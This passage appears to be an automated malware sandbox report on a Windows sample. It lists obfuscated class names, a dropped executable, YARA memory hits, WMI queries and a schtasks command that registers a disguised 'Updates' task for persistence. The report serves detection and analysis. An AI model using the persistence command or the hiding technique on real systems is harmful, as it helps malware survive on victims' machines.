Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, kdFvaMFVPKs73pA7Ae.cs | High entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, DD.cs | High entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, ihWImL1h2qjtIkVYDh.cs | High entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, oImfMJtvGUo8fMQNBQ.cs | High entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, wehuuoKhMKMbnQu72K.cs | High entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, j9YWqGoNkeAufjqtfr.cs | High entropy of concatenated method names: 'SwVBC7ZCD1', 'jhUBUErGuT', 'bffBomOKCf', 'W4uBflm9Px', 'UEjBMaa25b', 'MPCBNmn75V', 'Ig1B9KdYih', 'OsrBLCjqaJ', 'wsXBRXOfsc', 'FleBgTAvaX'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | High entropy of concatenated method names: 'G9ndk8TnsG', 'jg3dZIJEHi', 'LjBdVa96e6', 'njPd8sy7Bo', 'kxQda3li6Z', 'ktdd2esIcl', 'JrRdebPBPP', 'a9edxPJqAd', 'Pfjd1MdnoS', 'CxUdIT8csT'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, WEkvyEiPg4exp1JWJr.cs | High entropy of concatenated method names: 'PZc8DdvK17', 'l9p87q38HQ', 'j5W8ExCVDC', 'gV68igLBCF', 'KsN8BH6Ooe', 'NcJ8QB2txh', 'iyL8s6pMM1', 'qVj8cTJkLf', 'g8086nvp58', 'krU8GwMf5Z'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, rbl15J4iXuiF3yd9Pd.cs | High entropy of concatenated method names: 'jOI63gVPXi', 'n296d5fH6H', 'Ul06rRK1yH', 'CMM6ZfhKG5', 'X5f6VZ7J6u', 'RES6aFvqWa', 'YxO621gL0n', 'evMcn1TQak', 'AhgcAtQIsF', 'WfYc5Ak4NU'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, Icw0P7E5I25dt8WiCY.cs | High entropy of concatenated method names: 'Gk3Vojd3xF', 'UpXVfsYioH', 'W48VHS9vLY', 'H5RVj2QvDd', 'rsNVSgaler', 'bw3VuusPrG', 'xqWVn6ipha', 'C8kVAN9vCL', 'ehcV5kxvk1', 'QXSV4KGidN'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, XwoIjq3XxNvPNWGVI52.cs | High entropy of concatenated method names: 'S9I6quAppn', 'JlE6PcGTqv', 'SpB60KOY5L', 'qjP6DTT0Do', 'xvT6FBq7tV', 'vsK67TUO69', 'KE46ykTPUU', 'xK26Ei4Otb', 'Jov6irQGiN', 'Aal6mlCDlR'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, OPdVgnRx7UCY8cpdFo.cs | High entropy of concatenated method names: 'TfZ2HWlAL0', 'CDH2jiyDlM', 'PsY2SKfM56', 'ToString', 'nRi2uMGmfV', 'mGS2ns9kQw', 'VW1wfe4cQXhE4QS8t0q', 'gIuVL14qtxlhqLcSKme', 'V9HCGv4MNGDARBt7yYF'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, iKYG0MmubIw9OVMBtg.cs | High entropy of concatenated method names: 'NfWaFrMeCy', 'ocvayym4Vb', 'Qxt8NPGEbw', 'bge89L9aFL', 'FrV8L75enC', 'nCK8RO97jH', 'y8H8gXfMji', 'cgq8l6SElR', 'KXV8wZV4Ij', 'J1J8CpPc5G'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, BAqoVNzExaAeveETi0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nGt6KZD8kW', 'B2m6Bd1g5G', 'x5b6QwrK0C', 'l186sOqVHA', 'KWC6c28yta', 'S1x660KrN3', 'qx36G2ePrT'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, owyQps3JsOel92LKCfT.cs | High entropy of concatenated method names: 'yyPGquyU4J', 'HOBGPMb2R8', 'fbcG0exi88', 'm4Xi4D0WUGYwl2iwreo', 'PuZ1ee0GpkK7MHMmbUx', 'kDh9Ln0LiWLB6pRTekC', 'zlLPV70uhF5v6O9SMMp', 'MWOUVt0zq9CgoKTPbNF'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, lvrY9n9k7lkh9Cl70l.cs | High entropy of concatenated method names: 'dyU2vNq71H', 'bRk2qHAGtX', 'Qpn20Ie8IK', 'Dil2DQptVJ', 'y1k27iNsb5', 'imx2yTZCEx', 'CPt2ivNXMG', 'iO42m3uRWh', 'PlRYxG4EB672Ssut5jP', 's5Cqvv4dQVZ9udH5QQS'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, CrVdkuWHH6itGcKud7.cs | High entropy of concatenated method names: 'cs42ktJLwq', 'L0R2Vd9YmN', 'j2c2apgiGR', 'FVi2eCaI7X', 'F2X2x6jpsg', 'oSOaSIiBMG', 'lmtauUo0RN', 'fHFann456d', 'EG4aAj3BkZ', 'FVaa5gAE3p'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, TNI5rOjXvELxKJP6Fj.cs | High entropy of concatenated method names: 'CfksIuq50j', 'kvuspBFKxM', 'ToString', 'dR8sZa01jf', 'oBSsVBpPcp', 'EDos8Jm6MH', 'W6YsaP3s3U', 'lG5s2hT04B', 'FJ5seKuLH4', 'bJ9sxIrLJu'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, dMt11SJRe8APP9s2WL.cs | High entropy of concatenated method names: 'DfW0LGWf8', 'yl0DiW3Mk', 'XO87wDb8b', 'ljCyYh3ms', 'buqi4rcbN', 'ipvmXVMfp', 'TVQXYPh1C0sAYF3Uxd', 'UlSnaZ81YHSEFdtVni', 'pOZMDMIS6fcFdyJc9P', 'RA0cppkBm'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, QG7R5hgsvLbIepY6MR.cs | High entropy of concatenated method names: 'Qp9eZZB71w', 'sLGe8FrGFy', 'X5we2jcUuR', 'nDr24KU9Ms', 'itR2zuHXIZ', 'niXeXg3iOh', 'gk6e3O0EKL', 'iDleJWGD9X', 'OjiedqZRku', 'mGQeruVZC1'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, vVZlyfwE6D6VO1P3fu.cs | High entropy of concatenated method names: 'IS6eqWM1UO', 'aqqePdd4Ww', 'dQoe0qsNj8', 'ucbeDX7HC8', 'NcGeFZ58HE', 'SYRe7ktiZp', 'GRkey9vBMa', 'eMmeEgpjoi', 'gfueiotCx9', 'Rd3em2EVjB'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, yp7P2SryFTLLqPCLLF.cs | High entropy of concatenated method names: 'S393ecw0P7', 'YI23x5dt8W', 'EPg3I4exp1', 'cWJ3pr2KYG', 'gMB3Btg7rV', 'dku3QHH6it', 'Tga5uvB9jYMQHAFdI2', 'YHSRAKNCSCobJVmv0l', 'K1c331286p', 'zrj3dLrk18'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, WTyLNRuTreLPB4U01m.cs | High entropy of concatenated method names: 'CQMsApFQ0g', 'OGIs4PsFeP', 'QdAcXpX1b3', 'fPmc3asCCe', 'haUsTyBEYH', 'Y1DsUeR6fJ', 'XpssbgB0KU', 'yOSsoK7bGf', 'MMcsfgZliF', 'dC8sH0qY0s'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, NpB9h6VafMhAx1WsJp.cs | High entropy of concatenated method names: 'Dispose', 'AJi35vDi97', 'BTHJMf9HMs', 'tAuccFwjJ9', 'IHh34UJHEi', 'Hv53zFuv68', 'ProcessDialogKey', 'niWJXfxvCg', 'V7eJ31vJQV', 'AXCJJcbl15'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ShUJHEAiMv5Fuv68Ki.cs | High entropy of concatenated method names: 'reicZxmOIa', 'mVrcVTteJu', 'qkxc8Byeb0', 'yDEca2XNs6', 'S2lc22ZKj2', 'uv5ceGNQjL', 'pwhcxLYg6y', 'VfLc1iJT7L', 'CkXcI4I5TX', 'DUdcpuyU5N'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, z2DRmH3drgXDZwPhdrF.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VciGoABM39', 'wm2GfLRJ7I', 'UqgGHbEgff', 'vfPGjQqj3q', 'uVRGS29YT5', 'HeOGu5CcVi', 'C0oGnAM5Qv'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, yWjIbkbFk9uQinWgPH.cs | High entropy of concatenated method names: 'PGbKEHongF', 'qe7KiRBmqH', 'PmCKW3fLEF', 'qaFKMKqOke', 'IddK9nSrCj', 'qPnKLVpZk7', 'mk2KgF0FaP', 'TyJKlLtkL3', 'XUwKCXwIjQ', 'F3GKThIsTt'
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, GfxvCg5n7e1vJQVDXC.cs | High entropy of concatenated method names: 'B66cWq08vZ', 'PjOcMQSOoJ', 'HENcNl88o6', 'bKEc9YpV10', 'lgtcoGe4TI', 'UsNcLkoHPf', 'Next', 'Next', 'Next', 'NextBytes'
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | File created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe

Boot Survival

Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match, File source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 6668, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7680, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 1300000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 2E90000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 4E90000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 7C00000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 8C00000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 8EB0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 9EB0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 1340000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 2E70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Memory allocated: 14A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: 2FB0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: 31E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: 3020000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: 79D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: 89D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: F60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: 2CE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Memory allocated: 2A70000 memory reserve | memory write watch
